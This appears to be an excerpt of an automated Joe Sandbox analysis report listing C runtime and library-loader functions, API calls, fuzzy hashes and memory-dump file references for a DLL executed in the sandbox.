Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
String ID:
API String ID: 2227236058-0
Opcode ID: 9887fdf08b9d04355a39b1973d739e00a48c3a9c82a6eb2cd82ef9d69c6e3ed6
Instruction ID: 4bfa57363cec1490ab4f8975f6db359a932312c3d989d153e2165bc180d07b3e
Opcode Fuzzy Hash: 9887fdf08b9d04355a39b1973d739e00a48c3a9c82a6eb2cd82ef9d69c6e3ed6
Instruction Fuzzy Hash: 84315D71E053199FDB10CAA58944B9EB7B8AF1571DF240219E839EB780D730A905CB62

Function 6CECE4E4 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 6CECE4E4

Part of subcall function 6CED0C52: EncodePointer.KERNEL32(00000000,00000001,6CECE4E9,6CECC319,6CEEAD58,00000008,6CECC4DF,?,00000001,?,6CEEAD78,0000000C,6CECC47E,?,00000001,?), ref: 6CED0C55
Part of subcall function 6CED0C52: __initp_misc_winsig.LIBCMT ref: 6CED0C70
Part of subcall function 6CED0C52: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6CED1781
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6CED1795
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6CED17A8
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6CED17BB
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6CED17CE
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6CED17E1
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6CED17F4
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6CED1807
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6CED181A
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6CED182D
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6CED1840
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6CED1853
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6CED1866
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6CED1879
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6CED188C
Part of subcall function 6CED0C52: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6CED189F

__mtinitlocks.LIBCMT ref: 6CECE4E9
__mtterm.LIBCMT ref: 6CECE4F2

Part of subcall function 6CECE55A: DeleteCriticalSection.KERNEL32(?,?,?,?,6CECC3E4,6CECC3CA,6CEEAD58,00000008,6CECC4DF,?,00000001,?,6CEEAD78,0000000C,6CECC47E,?), ref: 6CED1088
Part of subcall function 6CECE55A: _free.LIBCMT ref: 6CED108F
Part of subcall function 6CECE55A: DeleteCriticalSection.KERNEL32(6CEED978,?,?,6CECC3E4,6CECC3CA,6CEEAD58,00000008,6CECC4DF,?,00000001,?,6CEEAD78,0000000C,6CECC47E,?,00000001), ref: 6CED10B1

__calloc_crt.LIBCMT ref: 6CECE517
__initptd.LIBCMT ref: 6CECE539
GetCurrentThreadId.KERNEL32 ref: 6CECE540

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: e44a64e99fd5a70298c24eb7d9d4b61ec494b8a7d59e8507694b282a0103fbcf
Instruction ID: 43bbda00f41fcf7568b3795ef2ace30ec50b1ae640c91799c7ab885b797f00c8
Opcode Fuzzy Hash: e44a64e99fd5a70298c24eb7d9d4b61ec494b8a7d59e8507694b282a0103fbcf
Instruction Fuzzy Hash: F0F0963730AF6159E66466B8BE026CA2BB49B0267DB31461DF474C6BC0FF10D44681D6

Function 6CECBC14 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,6CECBCDD,?), ref: 6CECBC2E
GetProcAddress.KERNEL32(00000000), ref: 6CECBC35
EncodePointer.KERNEL32(00000000), ref: 6CECBC41
DecodePointer.KERNEL32(00000001,6CECBCDD,?), ref: 6CECBC5E

Strings

combase.dll, xrefs: 6CECBC29
RoInitialize, xrefs: 6CECBC1D

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: fc95c2f803a65bd387c1e0761ae72d094655d2048ab35c0e28f800821e331452
Instruction ID: f23faf9781737bc55695275610ffc12094dea6122f30100e575fb629b3ad7933
Opcode Fuzzy Hash: fc95c2f803a65bd387c1e0761ae72d094655d2048ab35c0e28f800821e331452
Instruction Fuzzy Hash: 94E01A71B90380AFEF915F75DD4CF043678A78A7CAFA05964B226D9180CF754088EF50

Function 6CECBCE9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,6CECBC03), ref: 6CECBD03
GetProcAddress.KERNEL32(00000000), ref: 6CECBD0A
EncodePointer.KERNEL32(00000000), ref: 6CECBD15
DecodePointer.KERNEL32(6CECBC03), ref: 6CECBD30

Strings

combase.dll, xrefs: 6CECBCFE
RoUninitialize, xrefs: 6CECBCF2

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: c347f71645f4e9cbb1c9f4bbafd196147cbe049fcb10528375fe8d9ad7448d6d
Instruction ID: 85882c74c154837950a9ff3030a60cbd7dc437c6996115344fb26efebfc5a819
Opcode Fuzzy Hash: c347f71645f4e9cbb1c9f4bbafd196147cbe049fcb10528375fe8d9ad7448d6d
Instruction Fuzzy Hash: BBE0B675B41280ABEF905B609D0CB043A74F78A3A6F604954F12AE5581DF788884DB19

Function 6CECA6A0 Relevance: 10.2, APIs: 8, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000023,321BCB28,?,?,?,?,00000000,6CEDF2C8,000000FF,6CECA93A), ref: 6CECA6DA
TlsSetValue.KERNEL32(00000023,6CECA93A,?,?,00000000), ref: 6CECA747
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6CECA771
HeapFree.KERNEL32(00000000), ref: 6CECA774

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: HeapValue$FreeProcess
String ID:
API String ID: 1812714009-0
Opcode ID: e75b1620e32988840b6cc26efa7d822f9daf9a9da7748e2cd10c1330eb48772c
Instruction ID: d247649443776f22e0daade59204882fc222a2737bff4917cadab40b29420080
Opcode Fuzzy Hash: e75b1620e32988840b6cc26efa7d822f9daf9a9da7748e2cd10c1330eb48772c
Instruction Fuzzy Hash: 5751BF35B443449FDB50CF29C588B1677F5BB49368F298A58F87897B80D734AC02CB92

Function 6CEDDC00 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 6CEDDD10
__FindPESection.LIBCMT ref: 6CEDDD2A

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: be4247c68518a498bcf7efcff4ed864745098f419eb181250847bfd5bf69eb7b
Instruction ID: a8448177dc257eaf2065ea8ac5a8eff8d4f411ff374dae6e7ec376032e74de33
Opcode Fuzzy Hash: be4247c68518a498bcf7efcff4ed864745098f419eb181250847bfd5bf69eb7b
Instruction Fuzzy Hash: 55A1C0B9A056158FCB12CF59D88079DB7B4EB85318F364269DC15ABB41E731FA02CFA0

Function 6CED52B9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6CED534A
_memmove.LIBCMT ref: 6CED53BE
___AdjustPointer.LIBCMT ref: 6CED540F
_memmove.LIBCMT ref: 6CED5418

Strings

bad exception, xrefs: 6CED5349

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
